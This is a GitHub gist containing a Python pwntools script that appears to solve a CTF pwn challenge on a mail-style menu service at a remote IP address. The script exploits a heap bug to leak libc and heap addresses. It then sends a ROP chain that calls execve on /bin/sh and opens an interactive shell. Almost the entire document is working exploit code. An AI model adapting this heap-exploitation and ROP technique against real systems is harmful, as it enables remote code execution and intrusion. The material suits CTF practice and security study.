Skip to content

Instantly share code, notes, and snippets.

@sqrtrev
Created March 29, 2022 07:17
Show Gist options
  • Save sqrtrev/3ab17dbfae0d3e6d06aa28c9f97f7a18 to your computer and use it in GitHub Desktop.
Save sqrtrev/3ab17dbfae0d3e6d06aa28c9f97f7a18 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python3
#Solver by parrot / Chance of success is 50%
from pwn import *
import time
def recvMenu():
p.recvuntil('==================')
p.recvuntil('==================\n')
def createAcc(uname):
recvMenu()
p.sendline('0')
p.sendlineafter('=\n',uname)
def login(uname):
recvMenu()
p.sendline('1')
p.sendlineafter('=\n',uname)
def sendMsg(who,msg,z=True):
if(z):
recvMenu()
p.sendline('2')
p.sendlineafter('=\n',msg)
p.sendlineafter('=\n',who)
time.sleep(0.2)
def delMsg(idx):
recvMenu()
p.sendline('4')
p.sendlineafter('=\n',str(idx))
def inbox(idx):
recvMenu()
p.sendline('3')
p.recvuntil('=\n')
p.sendline(str(idx))
# p = process('./a.out',aslr=False)
# p = process('./mail',env={'LD_LIBRARY_PATH':'./libs'})
p = remote('34.146.156.91',10004)
#######################
createAcc('a')
login('a')
c = p64(0xdeedbeefdeedbeef) #vtable
c+= p64(0xdeedbeef) #msgaddr
c+= p64(0x1337) #msgsize
c+= p64(0xdeedbeef) #namepointer
sendMsg('a',p64(0xdeedbeefdeedbeef)+p64(0x0000000000608028)+p64(0x8)+p64(0x404dd6))
# sendMsg('a',p64(0xdeedbeefdeedbeef)+p64(0x000055555555ff70)+p64(0x16)+p64(0x15555549734e))
sendMsg('a','lqmao')
sendMsg('a','lmao')
sendMsg('a','lmao')
sendMsg('a','lmao')
sendMsg('a','lmao')
inbox(0)
recvMenu()
c = '0\n'
c+= 'A'*0x400+'\n'
c+= '2\n'
c+= 'A'*0x90+'\n'
c+= 'a\n'
c+= '2\n'
c+= 'Q'*0x430+'\n'
p.send(c)
time.sleep(0.5)
p.send('AAAAAAAAA\n')
p.sendline('3\n6\n')
p.recvuntil('Inbox message\n')
libcbase = int.from_bytes(p.recvuntil('=')[:-2],byteorder='little') - 1108016
print(hex(libcbase))
############################
sendMsg('a',p64(0xdeedbeefdeedbeef)+p64(libcbase+0x1ecbe0)+p64(0x8)+p64(0x404dd6),False)
# sendMsg('a',p64(0xdeedbeefdeedbeef)+p64(0x000055555555ff70)+p64(0x16)+p64(0x15555549734e),False)
inbox(7)
recvMenu()
c = '0\n'
c+= 'A'*0x400+'\n'
c+= '2\n'
c+= 'Z'*0x90+'\n'
c+= 'a\n'
c+= '2\n'
c+= 'Q'*0x430+'\n'
p.send(c)
time.sleep(0.5)
p.send('AAAAAAAAA\n')
inbox(8)
p.recvuntil('Inbox message\n')
heapleak = int.from_bytes(p.recvuntil('=')[:-2],byteorder='little')
print(hex(heapleak))
c = b'id'.ljust(0x8,b'\x00')
c+= p64(libcbase+0x54f8d)
sendMsg('a',c,False)
############################
# sendMsg('a',p64(0x555555575900)+p64(0)+p64(0)+p64(0x15555549734e),False)
sendMsg('a',p64(heapleak+64)+p64(heapleak+64)+p64(0x8)+p64(0x404dd6),False)
inbox(10)
recvMenu()
c = '0\n'
c+= 'A'*0x400+'\n'
c+= '2\n'
c+= 'A'*0x90+'\n'
c+= 'a\n'
c+= '2\n'
c+= 'Q'*0x430+'\n'
p.send(c)
time.sleep(0.5)
p.send(b'AAAAAAAA\n')
c = p64(0xdeedbeefdeedbeef)*2
c+= p64(heapleak+0xdd8)
c+= p64(libcbase+0x000000000015f7e6)
c+= p64(0x13371337)
###############
c+= p64(libcbase+0x0000000000023b72) # pop rdi
c+= p64(heapleak+0xe28+0x20)
c+= p64(libcbase+0x000000000002604f) # pop rsi
c+= p64(heapleak+0xe28)
c+= p64(libcbase+0x0000000000119241)
c+= p64(0)
c+= p64(0)
c+= p64(libcbase+0x00000000000e31a0)
c+= p64(heapleak+0xe28+0x20)
c+= p64(heapleak+0xe28+0x20+0x8)
c+= p64(heapleak+0xe28+0x20+0x10)
c+= p64(0)
# execve -> 00000000000e31a0
c+= b'/bin/sh\x00'
c+= b'-c\x00\x00\x00\x00\x00\x00'
c+= b'/bin/sh\x00'
sendMsg('a',c,False)
print(hex(libcbase+0x00000000000e31a0))
input()
inbox(11)
delMsg(11)
p.interactive()
# createAcc('lmaook13377777777777777777777777')
#
# delMsg(4)
# delMsg(0)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment